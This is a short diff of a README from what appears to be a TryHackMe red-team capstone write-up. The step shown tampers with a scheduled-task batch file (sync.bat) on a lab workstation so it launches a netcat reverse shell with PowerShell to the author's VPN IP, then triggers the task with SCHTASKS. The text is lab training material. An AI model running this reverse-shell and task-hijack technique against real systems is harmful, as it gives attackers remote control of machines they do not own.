zinzloun/THM_WriteUP/RTM_Capstone/README.md

  On wrk2 modify sync.bat as follows:

  	copy C:\Windows\Temp \\s3.corp.thereserve.loc\backups\ & C:\users\laura.wood\Downloads\nc.exe 12.100.1.8 1234 -e powershell
 The IP address refers to my VPN IP on tun0 interface.
-Then you can wait 5 minutes when the task will be executed or lunch it manually using
+Then you can wait 5 minutes when the task will be executed or lunch it manually using the command:

 	SCHTASKS /Run /? /TN FULLSYNC